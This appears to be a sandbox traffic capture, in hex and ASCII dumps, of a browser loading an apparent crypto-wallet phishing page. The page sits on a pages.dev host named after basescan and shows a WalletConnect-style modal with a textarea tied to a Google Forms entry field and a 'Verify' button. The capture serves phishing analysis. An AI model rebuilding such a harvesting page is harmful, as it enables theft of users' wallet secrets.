                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 74 79 3a 20 68 69 64 64 65 6e 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 22 0d 0a 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 0d 0a 20 20 20 20 20 20 20 20 69 64 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 71 72 63 6f 64 65 2d 6d 6f 64 61 6c 22 0d 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 71 72 63 6f 64 65 5f 5f 62 61 73 65 20 61 6e 69 6d 61 74 65 64 20 66 61 64 65 49 6e 22 0d 0a 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 62 61 73 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e
                                                                                                                                                                                                                                              Data Ascii: ty: hidden; overflow: hidden; z-index: 100" > <div id="walletconnect-qrcode-modal" class="walletconnect-qrcode__base animated fadeIn" > <div class="walletconnect-modal__base"> <div class="walletconn
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 4c 37 39 2e 35 34 32 33 30 32 2c 37 30 2e 39 36 38 35 35 39 32 20 43 37 38 2e 33 31 39 35 32 30 34 2c 37 32 2e 31 36 35 37 36 33 33 20 37 36 2e 33 33 37 30 30 31 2c 37 32 2e 31 36 35 37 36 33 33 20 37 35 2e 31 31 34 32 32 31 34 2c 37 30 2e 39 36 38 35 35 39 32 20 4c 35 34 2e 39 37 37 35 32 36 35 2c 35 31 2e 32 35 33 30 35 36 31 20 43 35 32 2e 35 33 31 39 36 35 33 2c 34 38 2e 38 35 38 36 34 36 39 20 35 32 2e 35 33 31 39 36 35 33 2c 34 34 2e 39 37 36 35 34 33 39 20 35 34 2e 39 37 37 35 32 36 35 2c 34 32 2e 35 38 32 31 33 35 37 20 4c 36 31 2e 34 33 38 35 34 32 39 2c 33 36 2e 32 35 36 32 36 31 32 20 5a 20 4d 32 38 30 2e 32 30 36 33 33 39 2c 37 37 2e 30 33 30 30 30 36 31 20 4c 32 39 38 2e 31 32 38 30 33 36 2c 39 34 2e 35 37 36 39 30 33 31 20 43 33 30 30 2e 35
                                                                                                                                                                                                                                              Data Ascii: L79.542302,70.9685592 C78.3195204,72.1657633 76.337001,72.1657633 75.1142214,70.9685592 L54.9775265,51.2530561 C52.5319653,48.8586469 52.5319653,44.9765439 54.9775265,42.5821357 L61.4385429,36.2562612 Z M280.206339,77.0300061 L298.128036,94.5769031 C300.5
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 2e 30 33 30 30 30 36 31 20 43 32 37 33 2e 37 39 35 37 34 2c 37 34 2e 36 33 35 35 39 36 39 20 32 37 37 2e 37 36 30 37 37 38 2c 37 34 2e 36 33 35 35 39 36 39 20 32 38 30 2e 32 30 36 33 33 39 2c 37 37 2e 30 33 30 30 30 36 31 20 5a 26 23 33 39 3b 20 69 64 3d 26 23 33 39 3b 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 26 23 33 39 3b 25 33 45 25 33 43 2f 70 61 74 68 25 33 45 20 25 33 43 2f 67 25 33 45 20 25 33 43 2f 67 25 33 45 20 25 33 43 2f 73 76 67 25 33 45 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 68 65 61 64 65 72 4c 6f 67 6f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 3c 2f
                                                                                                                                                                                                                                              Data Ascii: .0300061 C273.79574,74.6355969 277.760778,74.6355969 280.206339,77.0300061 Z&#39; id=&#39;WalletConnect&#39;%3E%3C/path%3E %3C/g%3E %3C/g%3E %3C/svg%3E" class="walletconnect-modal__headerLogo" /> <p>WalletConnect</
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 76 6f 74 61 72 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 65 78 74 61 72 65 61 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 65 6e 74 72 79 2e 32 30 33 36 35 30 31 33 35 33 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 74 65 78 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 49 6e 70 75 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69
                                                                                                                                                                                                                                              Data Ascii: target="votar" style="width: 100%" > <textarea name="entry.2036501353" type="text" id="pInput" class="i
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 65 3d 22 73 75 62 6d 69 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3d 22 6c 69 67 68 74 42 6c 75 65 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 63 2d 67 74 73 72 48 54 20 67 66 75 53 71 47 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 69 66 79 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d
                                                                                                                                                                                                                                              Data Ascii: e="submit" color="lightBlue" style="display: block; justify-content: center" > <div class="sc-gtsrHT gfuSqG"></div> Verify </button>
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC911INData Raw: 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 62 74 6e 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 68 69 64 65 4c 6f 61 64 65 72 28 29 22 2c 20 34 20 2a 20 31 30 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 4c 6f 61 64 65 72 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 6f 61 64 65 72 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e
                                                                                                                                                                                                                                              Data Ascii: ocument.getElementById("pbtn").style.display = "none"; setTimeout("hideLoader()", 4 * 1000); } function hideLoader() { document.getElementById("loader").style.display = "non
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              139192.168.2.549890104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC660OUTGET /images/svg/brands/main.svg?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC798INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                              Content-Length: 1313
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 10 May 2023 12:48:47 GMT
                                                                                                                                                                                                                                              ETag: "8061e2c23d83d91:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 87388
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ttkbEeJo6IAIHdXauCMPE4rYMHVXadKvo7Iry08EPmfa2b3EpupxIEKFVUi1IkVvctKc3FzY7ZlGHPbh6dobdihR16I7qktQoWVKKp7LQE85iD%2FJcpQAvq%2F%2Bbbnrxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f0d96a5e76-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC571INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 35 36 22 20 68 65 69 67 68 74 3d 22 32 35 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 35 36 20 32 35 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 38 36 2e 33 38 34 20 31 37 31 2e 35 36 31 4c 32 34 33 2e 34 39 37 20 31 33 38 2e 35 38 38 43 32 34 36 2e 35 31 38 20 31 33 36 2e 38 34 32 20 32 34 38 2e 33 39 37 20 31 33 33 2e 35 39 31 20 32 34 38 2e 33 39 37 20 31 33 30 2e 30 39 39 56 36 34 2e 31 34 33 33 43 32 34 38 2e 33 39 37 20 36 30 2e 36 35 36 36 20 32 34 36 2e 35 31 38 20 35 37 2e 34 30 30 33 20 32 34 33 2e 34 39 37 20 35 35 2e 36 35 34 33 4c 31 38 36 2e 33 38 34 20 32
                                                                                                                                                                                                                                              Data Ascii: <svg width="256" height="256" viewBox="0 0 256 256" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M186.384 171.561L243.497 138.588C246.518 136.842 248.397 133.591 248.397 130.099V64.1433C248.397 60.6566 246.518 57.4003 243.497 55.6543L186.384 2
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC742INData Raw: 2e 35 30 33 34 20 31 31 37 2e 34 31 37 43 39 2e 34 38 32 35 36 20 31 31 39 2e 31 36 33 20 37 2e 36 30 33 35 32 20 31 32 32 2e 34 31 34 20 37 2e 36 30 33 35 32 20 31 32 35 2e 39 30 36 56 31 39 31 2e 38 35 37 43 37 2e 36 30 33 35 32 20 31 39 35 2e 33 34 33 20 39 2e 34 38 32 35 36 20 31 39 38 2e 36 20 31 32 2e 35 30 33 34 20 32 30 30 2e 33 34 36 4c 36 39 2e 36 31 37 20 32 33 33 2e 33 32 33 43 37 32 2e 36 33 37 38 20 32 33 35 2e 30 36 34 20 37 36 2e 33 39 30 37 20 32 33 35 2e 30 36 34 20 37 39 2e 34 31 36 36 20 32 33 33 2e 33 32 33 4c 31 33 36 2e 35 33 20 32 30 30 2e 33 35 31 43 31 33 39 2e 35 35 31 20 31 39 38 2e 36 30 35 20 31 34 31 2e 34 33 20 31 39 35 2e 33 34 38 20 31 34 31 2e 34 33 20 31 39 31 2e 38 36 32 56 37 34 2e 30 30 34 34 4c 31 34 32 2e 31 35 32
                                                                                                                                                                                                                                              Data Ascii: .5034 117.417C9.48256 119.163 7.60352 122.414 7.60352 125.906V191.857C7.60352 195.343 9.48256 198.6 12.5034 200.346L69.617 233.323C72.6378 235.064 76.3907 235.064 79.4166 233.323L136.53 200.351C139.551 198.605 141.43 195.348 141.43 191.862V74.0044L142.152


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              140192.168.2.549894104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC398OUTGET /public/getAssetImage/600a9a04-c1b9-42ca-6785-9b4b6ff85200 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC274INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                              Content-Length: 9
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=300, s-maxage=300
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f10ba643f2-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC9INData Raw: 46 6f 72 62 69 64 64 65 6e
                                                                                                                                                                                                                                              Data Ascii: Forbidden


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              141192.168.2.549895104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC398OUTGET /public/getAssetImage/41d04d42-da3b-4453-8506-668cc0727900 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC304INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                              Content-Length: 9
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=300, s-maxage=300
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f10dc07ce8-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC9INData Raw: 46 6f 72 62 69 64 64 65 6e
                                                                                                                                                                                                                                              Data Ascii: Forbidden


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              142192.168.2.549892104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC398OUTGET /public/getAssetImage/ab9c186a-c52f-464b-2906-ca59d760a400 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC314INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                              Content-Length: 9
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=300, s-maxage=300
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f10ee48c6f-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC9INData Raw: 46 6f 72 62 69 64 64 65 6e
                                                                                                                                                                                                                                              Data Ascii: Forbidden


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              143192.168.2.549893104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC398OUTGET /public/getAssetImage/06b26297-fe0c-4733-5d6b-ffa5498aac00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC314INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                              Content-Length: 9
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=300, s-maxage=300
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f1181d0ce1-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC9INData Raw: 46 6f 72 62 69 64 64 65 6e
                                                                                                                                                                                                                                              Data Ascii: Forbidden


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              144192.168.2.549899104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC361OUTGET /images/gen/stake-4_20.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 496
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: status=not_needed
                                                                                                                                                                                                                                              ETag: "0a274379b49da1:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 17 Jan 2024 23:16:36 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 104396
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pZpl6l801AhHN1Qw%2B4%2FNgAVEaxgJiTAntiCWp8B38boQhQfxFQF1BL8GKRR%2Fgi2Hee8o8BYY9adDFyT9AXFGBZOk7kVHYCJgJdcdG7gH2Cga%2Byiz9QAaMaIvNgELww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f10ae503d5-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC496INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff db 00 43 00 04 03 03 04 03 03 04 04 03 04 05 04 04 05 06 0a 07 06 06 06 06 0d 09 0a 08 0a 0f 0d 10 10 0f 0d 0f 0e 11 13 18 14 11 12 17 12 0e 0f 15 1c 15 17 19 19 1b 1b 1b 10 14 1d 1f 1d 1a 1f 18 1a 1b 1a ff db 00 43 01 04 05 05 06 05 06 0c 07 07 0c 1a 11 0f 11 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a ff c0 00 11 08 00 14 00 14 03 01 22 00 02 11 01 03 11 01 ff c4 00 19 00 01 00 02 03 00 00 00 00 00 00 00 00 00 00 00 00 00 06 07 03 05 08 ff c4 00 27 10 00 01 03 03 03 03 04 03 00 00 00 00 00 00 00 00 01 02 03 04 00 05 12 06 11 13 07 14 31 15 16 21 22 23 41 62 ff c4 00 18 01 00 03 01 01 00
                                                                                                                                                                                                                                              Data Ascii: JFIFCC"'1!"#Ab


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              145192.168.2.549891104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC398OUTGET /public/getAssetImage/7289c336-3981-4081-c5f4-efc26ac64a00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC274INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                              Content-Length: 9
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=300, s-maxage=300
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f10b5472c2-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC9INData Raw: 46 6f 72 62 69 64 64 65 6e
                                                                                                                                                                                                                                              Data Ascii: Forbidden


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              146192.168.2.549902104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC361OUTGET /images/gen/bcgame_20c.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
